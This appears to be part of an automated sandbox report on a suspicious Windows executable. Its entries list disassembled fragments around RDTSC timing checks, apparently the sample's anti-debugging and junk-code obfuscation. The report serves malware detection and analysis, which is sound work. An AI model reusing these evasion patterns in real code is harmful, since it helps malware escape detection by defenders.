                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3736B8 second address: 37376D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F29FC524578h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 jnl 00007F29FC52457Ch 0x0000002a push dword ptr fs:[00000000h] 0x00000031 jmp 00007F29FC524586h 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d or dword ptr [ebp+122D1ED1h], esi 0x00000043 mov eax, dword ptr [ebp+122D021Dh] 0x00000049 jmp 00007F29FC524581h 0x0000004e push FFFFFFFFh 0x00000050 push 00000000h 0x00000052 push ebp 0x00000053 call 00007F29FC524578h 0x00000058 pop ebp 0x00000059 mov dword ptr [esp+04h], ebp 0x0000005d add dword ptr [esp+04h], 00000018h 0x00000065 inc ebp 0x00000066 push ebp 0x00000067 ret 0x00000068 pop ebp 0x00000069 ret 0x0000006a mov edi, dword ptr [ebp+12480638h] 0x00000070 nop 0x00000071 push ebx 0x00000072 push eax 0x00000073 push edx 0x00000074 jmp 00007F29FC524585h 0x00000079 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 37376D second address: 373771 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3754EE second address: 375537 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F29FC524578h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F29FC524578h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 mov di, 0224h 0x00000029 push 00000000h 0x0000002b push edi 0x0000002c mov edi, dword ptr [ebp+1248087Ch] 0x00000032 pop ebx 0x00000033 push 00000000h 0x00000035 mov edi, dword ptr [ebp+122D35C1h] 0x0000003b xchg eax, esi 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 375537 second address: 37554E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC6B5CA2h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 37554E second address: 375554 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 375554 second address: 375558 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 374600 second address: 374604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 374604 second address: 374621 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC6B5CA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 374621 second address: 37469B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F29FC524578h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 push dword ptr fs:[00000000h] 0x0000002a push eax 0x0000002b sub dword ptr [ebp+1246D1B0h], edx 0x00000031 pop edi 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 mov dword ptr [ebp+122D29E2h], edx 0x0000003f mov eax, dword ptr [ebp+122D05A1h] 0x00000045 mov bh, al 0x00000047 push FFFFFFFFh 0x00000049 xor bh, FFFFFFA2h 0x0000004c nop 0x0000004d jmp 00007F29FC52457Ch 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F29FC524583h 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 37469B second address: 3746A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F29FC6B5C96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3746A5 second address: 3746A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3775DD second address: 3775E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3775E1 second address: 3775E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3775E5 second address: 3775EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3775EB second address: 377612 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F29FC524586h 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 377612 second address: 37761C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F29FC6B5C96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 37847A second address: 378490 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC524582h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3777E3 second address: 377814 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC6B5CA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push edi 0x0000000d jmp 00007F29FC6B5C9Ch 0x00000012 pop edi 0x00000013 pushad 0x00000014 ja 00007F29FC6B5C96h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 37A68E second address: 37A698 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F29FC524576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 379784 second address: 379788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 379788 second address: 37983F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC52457Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007F29FC524585h 0x00000012 push dword ptr fs:[00000000h] 0x00000019 sub di, 71D5h 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 push 00000000h 0x00000027 push ebx 0x00000028 call 00007F29FC524578h 0x0000002d pop ebx 0x0000002e mov dword ptr [esp+04h], ebx 0x00000032 add dword ptr [esp+04h], 00000019h 0x0000003a inc ebx 0x0000003b push ebx 0x0000003c ret 0x0000003d pop ebx 0x0000003e ret 0x0000003f pushad 0x00000040 add edi, 3A245357h 0x00000046 ja 00007F29FC524578h 0x0000004c popad 0x0000004d mov eax, dword ptr [ebp+122D1181h] 0x00000053 push 00000000h 0x00000055 push esi 0x00000056 call 00007F29FC524578h 0x0000005b pop esi 0x0000005c mov dword ptr [esp+04h], esi 0x00000060 add dword ptr [esp+04h], 00000017h 0x00000068 inc esi 0x00000069 push esi 0x0000006a ret 0x0000006b pop esi 0x0000006c ret 0x0000006d cld 0x0000006e push FFFFFFFFh 0x00000070 push eax 0x00000071 sbb edi, 2ED2E3F9h 0x00000077 pop edi 0x00000078 nop 0x00000079 push eax 0x0000007a push edx 0x0000007b jmp 00007F29FC524587h 0x00000080 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 37983F second address: 379846 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 379846 second address: 379868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F29FC524588h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 37B6BF second address: 37B6C9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F29FC6B5C9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 37D5CA second address: 37D5D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 37D5D0 second address: 37D5D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 37D5D5 second address: 37D5DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 37C717 second address: 37C71B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 37C82B second address: 37C835 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F29FC524576h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 37F527 second address: 37F531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F29FC6B5C96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 382D0D second address: 382D12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 382D12 second address: 382D2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC6B5C9Ch 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 382D2C second address: 382D32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 383EA6 second address: 383EC0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F29FC6B5C9Ah 0x00000008 jnp 00007F29FC6B5CA2h 0x0000000e jnc 00007F29FC6B5C96h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3279AB second address: 3279C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC524581h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3279C3 second address: 3279D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC6B5C9Ch 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 38AC36 second address: 38AC3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 38AC3C second address: 38AC49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F29FC6B5C9Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 38AC49 second address: 38AC51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 38AC51 second address: 38AC55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3918EB second address: 391907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jl 00007F29FC52457Ch 0x0000000b jbe 00007F29FC524576h 0x00000011 popad 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push esi 0x00000017 pushad 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 392D53 second address: 392D5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 397BBE second address: 397BCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnc 00007F29FC524576h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 31BA83 second address: 31BAAA instructions: 0x00000000 rdtsc 0x00000002 jp 00007F29FC6B5C98h 0x00000008 push ebx 0x00000009 jmp 00007F29FC6B5CA0h 0x0000000e pushad 0x0000000f popad 0x00000010 pop ebx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push esi 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 31BAAA second address: 31BAC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F29FC524586h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 397316 second address: 39731D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 39731D second address: 397322 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3975BD second address: 3975C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3975C3 second address: 3975D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F29FC52457Dh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3975D6 second address: 3975FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC6B5CA9h 0x00000007 jnp 00007F29FC6B5C9Eh 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 397890 second address: 3978B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F29FC52457Eh 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 397A40 second address: 397A46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 397A46 second address: 397A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 397A4A second address: 397A50 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 397A50 second address: 397A64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F29FC524576h 0x0000000e jno 00007F29FC524576h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 397A64 second address: 397A6A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 39D545 second address: 39D55F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F29FC524580h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 39C144 second address: 39C15E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F29FC6B5CA4h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 39C15E second address: 39C196 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F29FC524589h 0x00000010 push esi 0x00000011 jmp 00007F29FC524583h 0x00000016 pop esi 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 39C2BE second address: 39C316 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F29FC6B5CA8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jno 00007F29FC6B5C96h 0x00000012 jng 00007F29FC6B5C96h 0x00000018 popad 0x00000019 jmp 00007F29FC6B5CA4h 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F29FC6B5CA5h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 39C446 second address: 39C450 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F29FC524576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 39C751 second address: 39C76E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29FC6B5CA7h 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 39C8EE second address: 39C921 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC52457Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c jmp 00007F29FC524587h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jg 00007F29FC524576h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 39D42D second address: 39D434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3A2100 second address: 3A2104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3A2104 second address: 3A210E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F29FC6B5C96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3A0FAB second address: 3A0FC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F29FC52457Ch 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3661C3 second address: 3661C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3661C9 second address: 36621F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 lea eax, dword ptr [ebp+12480FCEh] 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F29FC524578h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 mov dword ptr [ebp+122D1C74h], edi 0x0000002f xor dword ptr [ebp+122D1F51h], edx 0x00000035 nop 0x00000036 pushad 0x00000037 push edi 0x00000038 jp 00007F29FC524576h 0x0000003e pop edi 0x0000003f push ebx 0x00000040 jnc 00007F29FC524576h 0x00000046 pop ebx 0x00000047 popad 0x00000048 push eax 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c jnc 00007F29FC524576h 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36621F second address: 36622D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F29FC6B5C9Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36622D second address: 34CD4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 jmp 00007F29FC52457Ch 0x0000000b call dword ptr [ebp+122D2A5Bh] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push edi 0x00000015 pop edi 0x00000016 jmp 00007F29FC524583h 0x0000001b popad 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 366C74 second address: 366C7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 366C7B second address: 366C80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36711F second address: 367125 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36730B second address: 36731C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29FC52457Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36749A second address: 3674B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29FC6B5CA8h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3675C4 second address: 3675CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3675CB second address: 3675D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3675D1 second address: 3675D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36689F second address: 3668FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 pushad 0x0000000a jmp 00007F29FC6B5C9Eh 0x0000000f jmp 00007F29FC6B5CA1h 0x00000014 popad 0x00000015 pop eax 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007F29FC6B5C98h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 mov dword ptr [ebp+122D35C7h], esi 0x00000036 push 0C75B0BDh 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e push ecx 0x0000003f pop ecx 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3A1B50 second address: 3A1B65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F29FC524576h 0x0000000f jg 00007F29FC524576h 0x00000015 rdtsc
